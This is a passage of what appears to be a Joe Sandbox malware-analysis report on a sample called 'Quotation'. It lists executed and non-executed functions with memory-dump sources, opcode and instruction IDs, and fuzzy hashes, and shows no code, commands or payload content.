                                          • Instruction Fuzzy Hash: 0FE0E530A401188FCB24EF50D8946A9BBB2EB4A314F5042D9945A67284CBB01D858F41
                                          Function 058D7541 Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 586fc29a6006956b2a718ac46767cf16af4cdc19d70f7ea23bb1f7cdd9f908c7
                                          • Instruction ID: 37d9224bffb5b9c0aa2fe6b6572a056444c65b0be07dfbc49941eac814ce85d2
                                          • Opcode Fuzzy Hash: 586fc29a6006956b2a718ac46767cf16af4cdc19d70f7ea23bb1f7cdd9f908c7
                                          • Instruction Fuzzy Hash: 7ED0A9B248EA488BC221CB60890E37AF7F8AB0A20EF0494849E1C96292CA705531C692
                                          Function 058DC708 Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0908c1f267c8f2dbd8c822b7761c663bb52d5c145f899148bb1a4a25842bc299
                                          • Instruction ID: 8bcde89f8b649f7bd1e1897ee9bf0a2080d6c6ee4df1b73f25a042237aa6c01f
                                          • Opcode Fuzzy Hash: 0908c1f267c8f2dbd8c822b7761c663bb52d5c145f899148bb1a4a25842bc299
                                          • Instruction Fuzzy Hash: 2BD0A77194A308DBCB55DA689000769F3EDA702105F1010E8CC0853250C7714D50CA61
                                          Function 0578DD45 Relevance: .0, Instructions: 15COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4bbe1bab5f77a8f5c4046ad7898aab80fda80248d9301b71dc500dce2e9c5e4c
                                          • Instruction ID: cce62d9c13ec766d952dd5f2021a6604932de01f75e5dd4523691245b0691439
                                          • Opcode Fuzzy Hash: 4bbe1bab5f77a8f5c4046ad7898aab80fda80248d9301b71dc500dce2e9c5e4c
                                          • Instruction Fuzzy Hash: E1E07574D54228CFDBA0DF64D84879EBBF2BB04304F0144DAD51AA2240D7701E90DF12
                                          Function 02248063 Relevance: .0, Instructions: 14COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2245769976.0000000002240000.00000040.00000800.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2240000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8c829a62adf26bdefae5a265e8cb6aec0d8e2e3256b29067faf4b1195e70e858
                                          • Instruction ID: 2013e2ca2e04526a1a139e62df58a38b8bfb4cfcb188f0a1c4db6153fa5e35f8
                                          • Opcode Fuzzy Hash: 8c829a62adf26bdefae5a265e8cb6aec0d8e2e3256b29067faf4b1195e70e858
                                          • Instruction Fuzzy Hash: E3D05E38952119DFDF648F50DC187E8B770FB40215F0003E6D41962190DB700AD4CE42
                                          Function 0584C580 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 190c5484c0aa2a77fe6baa3e18f3593fb16eb97448cc91a554442951374ba927
                                          • Instruction ID: a14b0ccefb9877af2739f0af39862c013be87463991a02d0a2b3c27298a9ea20
                                          • Opcode Fuzzy Hash: 190c5484c0aa2a77fe6baa3e18f3593fb16eb97448cc91a554442951374ba927
                                          • Instruction Fuzzy Hash: E3D0C939040214AFD7028B6AE445F967BE8EF04220F008066FA088B331EB76A854CE80
                                          Function 057880DB Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d078eea45d8e7c912ba72a8f693e35d33b5b1c6008f3e1b86baf5f66c2b9f53d
                                          • Instruction ID: 611b7b8574b36251a624ca0953b001ad1a08061222812cf7f4727f45ae74e5a6
                                          • Opcode Fuzzy Hash: d078eea45d8e7c912ba72a8f693e35d33b5b1c6008f3e1b86baf5f66c2b9f53d
                                          • Instruction Fuzzy Hash: 67D05E7461064C9FDB10EFA8ECA86AE77B6AB8A309F104159D009AB398DA309D958F40
                                          Function 05B9CF60 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2255143793.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5b80000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 661376f6d831f00db1bd72b884d547383f7a65f34defc961b85072ef79e880e8
                                          • Instruction ID: 783335edbba3529b732259b97078daaa86f3d44c59fd9e70746083b46ba60b29
                                          • Opcode Fuzzy Hash: 661376f6d831f00db1bd72b884d547383f7a65f34defc961b85072ef79e880e8
                                          • Instruction Fuzzy Hash: 1DC02B310CEB0883D7591350610C37D7FDCD303202F1029A0990D014B10AB06C6EC560
                                          Function 058D7550 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8f1f563d5d08ddeec983d72bb4adff6eb41ebac97afd83e7a772d95f86be1a77
                                          • Instruction ID: d01fd2eeea1b07d4a4ebde57fad38fda609ddc395704bafb8783a6f89b0f68bc
                                          • Opcode Fuzzy Hash: 8f1f563d5d08ddeec983d72bb4adff6eb41ebac97afd83e7a772d95f86be1a77
                                          • Instruction Fuzzy Hash: 21C02B7348F30C8BD111D740510C339F3FCE307206F00A8409D0DC11524A700871C2E2
                                          Function 0584FF40 Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 30bb0279705bb3631706109a711732a9932a8114447fef72e2238400a0fb6507
                                          • Instruction ID: 16526448c585250db2685d6f21a0bac649495cc12a20c9cec0033968226aac58
                                          • Opcode Fuzzy Hash: 30bb0279705bb3631706109a711732a9932a8114447fef72e2238400a0fb6507
                                          • Instruction Fuzzy Hash: 67D0C931510210DFDB47DF289125615BBE3FBD0301F508A39E90486724DF399855DA80
                                          Function 0224A790 Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2245769976.0000000002240000.00000040.00000800.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2240000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 668704d54db8519db99f94720c42f7fc68c324b443e146a9407ab1efed9d6bec
                                          • Instruction ID: 88ea382ed1607f0cf10b98b5ef9394afad7dad6a0270b14225a41c84dca6b7a9
                                          • Opcode Fuzzy Hash: 668704d54db8519db99f94720c42f7fc68c324b443e146a9407ab1efed9d6bec
                                          • Instruction Fuzzy Hash: F7C02B310A13099BE32933E4750E73DB7EC1B4236AF500150D51D110590F701064C977
                                          Function 0584E498 Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e3dd31fe5b94eb4742d932b1c7d3d8cff478dbf08b040b9bcfc3e3a0340b8ca8
                                          • Instruction ID: f4da6724e101a9942a573bb3d1fb5289af399c828fc1a19fc65416b7b24d6d9f
                                          • Opcode Fuzzy Hash: e3dd31fe5b94eb4742d932b1c7d3d8cff478dbf08b040b9bcfc3e3a0340b8ca8
                                          • Instruction Fuzzy Hash: A5D0A9311009098FC304CF20EA00E057760FF09300B1108E2E9088B1A2C730C430CA00
                                          Function 0578C653 Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1bc188175a3b0dfcfff5ba81d8822f1430c1a25720b85d6a7ff883773224c2a
                                          • Instruction ID: ee48b88d1b894635f2b0be134b5f816367f35e9a82cafdfaeae94d6302c4c2d5
                                          • Opcode Fuzzy Hash: e1bc188175a3b0dfcfff5ba81d8822f1430c1a25720b85d6a7ff883773224c2a
                                          • Instruction Fuzzy Hash: 57D092B4A04AA88FCB20EF18CC50BAABBF2BB14302F0081C68449A7304C7309E848F01
                                          Function 05843240 Relevance: .0, Instructions: 9COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 584a420c77ce6e89ab4e0727e5a4443ad77a65cfa798360cb7ddf93c2dc510c8
                                          • Instruction ID: 89afa0281a6ce69bf674c2bf0d5d14ce0d23c1ef5f06da719956e8af2821671e
                                          • Opcode Fuzzy Hash: 584a420c77ce6e89ab4e0727e5a4443ad77a65cfa798360cb7ddf93c2dc510c8
                                          • Instruction Fuzzy Hash: 71C02B32444108BFFB02CB14ED0AF1D3511E7C0300F02D629774186010DF704D00CF80
                                          Function 057867E1 Relevance: .0, Instructions: 9COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f6d3b59c1e8ee1f6663a14afb3b51b11b1eac0d167acb4519fe26c1358d1080d
                                          • Instruction ID: c4b00a3a6628923d84597c130a02f2c66c1ca3fab1322f5307e5e3ba79f0b485
                                          • Opcode Fuzzy Hash: f6d3b59c1e8ee1f6663a14afb3b51b11b1eac0d167acb4519fe26c1358d1080d
                                          • Instruction Fuzzy Hash: 70C00276E1001A9A8B00DAD9E4408DCB774EB94321B004427D614A6144D63115668F55
                                          Function 0584C590 Relevance: .0, Instructions: 8COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                          • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                          • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                          • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                          Function 05849CC0 Relevance: .0, Instructions: 8COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7e9035e77fac706de87deb7d72dbf33ae832a8ffd11aed858528a18af5644252
                                          • Instruction ID: a00f65bcec2f4fca9db94fb7350de5ad47ee75e40d985546207d0efa1cfe41de
                                          • Opcode Fuzzy Hash: 7e9035e77fac706de87deb7d72dbf33ae832a8ffd11aed858528a18af5644252
                                          • Instruction Fuzzy Hash: F6B0128784014231CA41B4A8D4853C00781CF5113CFE41450CD00C1300F40B850C0133
                                          Function 02240942 Relevance: .0, Instructions: 8COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2245769976.0000000002240000.00000040.00000800.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2240000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a7bbf31ff5fa8804f35ba2520b9c314409d0c730be0938cde973a0c2ec486d29
                                          • Instruction ID: 0ca3e157792d4aafca22a8861874b0c9f97f3dbaffcd8f0903ff414fd774f967
                                          • Opcode Fuzzy Hash: a7bbf31ff5fa8804f35ba2520b9c314409d0c730be0938cde973a0c2ec486d29
                                          • Instruction Fuzzy Hash: D2B09237A60019DBCF289AD5F8048ECB735EA88222B400062D32AA24108B201AA4CA51

                                          Non-executed Functions

                                          Function 058D0BE8 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ba<2
                                          • API String ID: 0-1113221628
                                          • Opcode ID: 3cc90564e648b8b48b8cbd4556a91c07b40b3f318de1821618fdb14c79efdd53
                                          • Instruction ID: 783449e65b5f6a947fdd11668799074d1951f63e8197720a1ebf68c704405bb9
                                          • Opcode Fuzzy Hash: 3cc90564e648b8b48b8cbd4556a91c07b40b3f318de1821618fdb14c79efdd53
                                          • Instruction Fuzzy Hash: 30C1F974D01218CFEB24DF65D888BADBBF2BB49305F1081AAD409EB295DB746D85CF21
                                          Function 05930040 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254869468.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5930000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: +
                                          • API String ID: 0-2126386893
                                          • Opcode ID: 6aae828ff56e9b288b03195df29158b6239dfaaf8ecd88513e96fdfc75e8afa0
                                          • Instruction ID: c0ce69561ef8f56fdfb14fcbb202b766c615ba1547f153c3c67537bb378a918e
                                          • Opcode Fuzzy Hash: 6aae828ff56e9b288b03195df29158b6239dfaaf8ecd88513e96fdfc75e8afa0
                                          • Instruction Fuzzy Hash: C7514D71D056588BEB6CCF6B8D456CAFAF7AFC9301F14C1FA954CA6254EB700A858F40
                                          Function 05786E50 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: t
                                          • API String ID: 0-2238339752
                                          • Opcode ID: 807a361a1dc6bd1b0ac0cc379501bb1d4ec0ec7531b174d29771e5e003aa76f5
                                          • Instruction ID: 9081b6d6698f5727be5d7ba1cbf67a6103c1035da977ed5259b06b9a49ab2a4d
                                          • Opcode Fuzzy Hash: 807a361a1dc6bd1b0ac0cc379501bb1d4ec0ec7531b174d29771e5e003aa76f5
                                          • Instruction Fuzzy Hash: 1D4161B1D45A589BEB1CDF6BCD4069EFAF3AFC9301F18C1B6940CAA268DB3045469F01
                                          Function 05780040 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: D
                                          • API String ID: 0-2746444292
                                          • Opcode ID: 145448bb27a3eb91c861ef90d9b71db02edc0ce29e6b6d61324bc718e9d8bf76
                                          • Instruction ID: afe23e8f6922f60a1250e20c0e6edc7e76454f20f09e48fc3811315a2cacb31f
                                          • Opcode Fuzzy Hash: 145448bb27a3eb91c861ef90d9b71db02edc0ce29e6b6d61324bc718e9d8bf76
                                          • Instruction Fuzzy Hash: AB318B71E056188BEB68DF6BC84969ABAF7AFC8310F14C1E9D40CA6224DB341A85DF10
                                          Function 05785368 Relevance: .4, Instructions: 431COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254037639.0000000005780000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5780000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 53977570f05b6d71c9be7d06f3369567aac74206a2efea82aaf842428273b1f3
                                          • Instruction ID: c84079d6fe1ea06089fec41abfd2371fdff5bd4bf8d420b6df5c752e7f60611f
                                          • Opcode Fuzzy Hash: 53977570f05b6d71c9be7d06f3369567aac74206a2efea82aaf842428273b1f3
                                          • Instruction Fuzzy Hash: 8A12A371E046189FDB14DFAAC98069EFBF2FF88304F24C169D459AB219D734A946CF90
                                          Function 02246F09 Relevance: .4, Instructions: 378COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2245769976.0000000002240000.00000040.00000800.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2240000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a2dd6d72c26a68cbdd48001b3939b5a7490575ed5e854074bd7b4941c5cbe2e
                                          • Instruction ID: 38e003bad7c1211a3bfa563e7c79a7931581872b7df46afc733cf7a7e62a3587
                                          • Opcode Fuzzy Hash: 6a2dd6d72c26a68cbdd48001b3939b5a7490575ed5e854074bd7b4941c5cbe2e
                                          • Instruction Fuzzy Hash: 47319BB1D056588BEB19CF6BC95578EFBF7AFC5304F14C1A9C408A6265DB7409458F01
                                          Function 05842DB8 Relevance: .4, Instructions: 351COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254285094.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5840000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 251c9d8c5698e365e9c8d6ab122709ffbbc06b2ab0d30852495a52666c10087e
                                          • Instruction ID: 64f5c74f0f73b42947ba458a2da8c7a55e4df7754b2d1729eb662dc32fd49f4a
                                          • Opcode Fuzzy Hash: 251c9d8c5698e365e9c8d6ab122709ffbbc06b2ab0d30852495a52666c10087e
                                          • Instruction Fuzzy Hash: 77E10934A046099FCB14DF69C584A69BBF2BF89310F658599EC16EB362DB34EC81CF50
                                          Function 05B9CB38 Relevance: .2, Instructions: 205COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2255143793.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5b80000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 804a095bf3a8fe47e82d7c8f5bf47ff472e89984896069f1341f9f0358ea6d62
                                          • Instruction ID: 03928a7e30a5eb1ae0b53451daf0e493050eba2e1b309def1f62f788692b05a9
                                          • Opcode Fuzzy Hash: 804a095bf3a8fe47e82d7c8f5bf47ff472e89984896069f1341f9f0358ea6d62
                                          • Instruction Fuzzy Hash: D581B070E44218CFEF28DF69C885BADBBB6BF89314F1490A9D409AB251DB746D85CF40
                                          Function 058D1458 Relevance: .2, Instructions: 201COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c293868b49ad16116033f18a4228deb0d8588828d83520e374dfc6ad3bbd8d05
                                          • Instruction ID: c6b76353cec5511e9aca07ebf6b176e1828462dd8886d923b9360b32c7229973
                                          • Opcode Fuzzy Hash: c293868b49ad16116033f18a4228deb0d8588828d83520e374dfc6ad3bbd8d05
                                          • Instruction Fuzzy Hash: 32810470E05208CFDB54DFA9D498BADBBF6AF4A308F109069D80AEB295DB349C45CF14
                                          Function 058D144B Relevance: .2, Instructions: 199COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c8ad6951b413075b61db147703bcdf46ab6744e3372c2bdbb0c5ea2685defa98
                                          • Instruction ID: f87cf7151bfbb5086c5b8045457b7ea1387e57f6025f7e440b2a1b40ee08f1f5
                                          • Opcode Fuzzy Hash: c8ad6951b413075b61db147703bcdf46ab6744e3372c2bdbb0c5ea2685defa98
                                          • Instruction Fuzzy Hash: 10810370E05208CFDB54DFA9D488BADBBF6AF4A308F109069D81AEB295DB349D45CF14
                                          Function 058D1546 Relevance: .2, Instructions: 194COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c2994f2ef598c50f187ba2813fc59107c0de2a4706f5846ec22a40939c993521
                                          • Instruction ID: fafe6bd236ce9bb8023f1a6c1d6b5ed41fb8c113e4f365615b6b7db90721997e
                                          • Opcode Fuzzy Hash: c2994f2ef598c50f187ba2813fc59107c0de2a4706f5846ec22a40939c993521
                                          • Instruction Fuzzy Hash: B271E370E05208CFDB54DFA9D488AADBBF6BF4A308F109069D41AEB265DB349D41CF14
                                          Function 058DC3D0 Relevance: .2, Instructions: 192COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 110f62f9db652c97bf41e1d2e3bee23792106b17aba402aa09258854b3e2a45d
                                          • Instruction ID: b632cef4a7c31e3a6aa2cd0334b8afe47e0464c8727e04c204fee4a36e3c886d
                                          • Opcode Fuzzy Hash: 110f62f9db652c97bf41e1d2e3bee23792106b17aba402aa09258854b3e2a45d
                                          • Instruction Fuzzy Hash: F571F670A05218CFDB54DFA4D5887BDFBF6FB8A304F105129E80AAB294DB749C46CB14
                                          Function 058DC3C0 Relevance: .2, Instructions: 191COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254754213.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_58d0000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b0acd363010c84597fb11ff9e01a626f680331d28e790674138353b9e5d75ea1
                                          • Instruction ID: 893a88510e59f785ab7f3bd312e47d54ed116f1542d7c6eccd8ece5afb8da586
                                          • Opcode Fuzzy Hash: b0acd363010c84597fb11ff9e01a626f680331d28e790674138353b9e5d75ea1
                                          • Instruction Fuzzy Hash: 21810770904218CFDB54DFA4D5887BDBBF2FB8A304F105129E80AAB294DB749C46CF15
                                          Function 058648A8 Relevance: .2, Instructions: 189COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 27d1e7c910a553b5266011d12074bfc769769c99cdee1e2b12e6f9d1c4e1b7f4
                                          • Instruction ID: c8644b55a969c3f0d76297793cb8992d36620ec03230fa13a71a926a0ebcb9d2
                                          • Opcode Fuzzy Hash: 27d1e7c910a553b5266011d12074bfc769769c99cdee1e2b12e6f9d1c4e1b7f4
                                          • Instruction Fuzzy Hash: 22810370D05208CFEB14DFA9D584BEDBBB6BB4A308F109169D819AB2A5DB745D86CF00
                                          Function 05864899 Relevance: .2, Instructions: 187COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2254356242.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5860000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b45e981a0e33791478f956116b8c7d4cc81efc750f67e79af3959f7c574fb227
                                          • Instruction ID: 35bbeb16376698b300b6c127b5c75cfec6bb15847af21746c0f5827add2ced45
                                          • Opcode Fuzzy Hash: b45e981a0e33791478f956116b8c7d4cc81efc750f67e79af3959f7c574fb227
                                          • Instruction Fuzzy Hash: 11810370D05208CFEB14DFA8D584BEDBBB2BB4A308F109169D819AB2A5DB745D86CF00
                                          Function 02246729 Relevance: .2, Instructions: 166COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2245769976.0000000002240000.00000040.00000800.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2240000_Quotation.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a84bd043a78139d14da8425468ef9e0de339b35b55ddcde91894cb5687435da0
                                          • Instruction ID: 34ef1c50d0446e75b73c6f34b845b1e400c24d00f63b783546adc3355101913a
                                          • Opcode Fuzzy Hash: a84bd043a78139d14da8425468ef9e0de339b35b55ddcde91894cb5687435da0
                                          • Instruction Fuzzy Hash: 7D715A70E40649CFEB58EFBAE89069ABBF7BBC9304F14C529C1149B268EB7058458F50
                                          Function 02246738 Relevance: .2, Instructions: 165COMMON
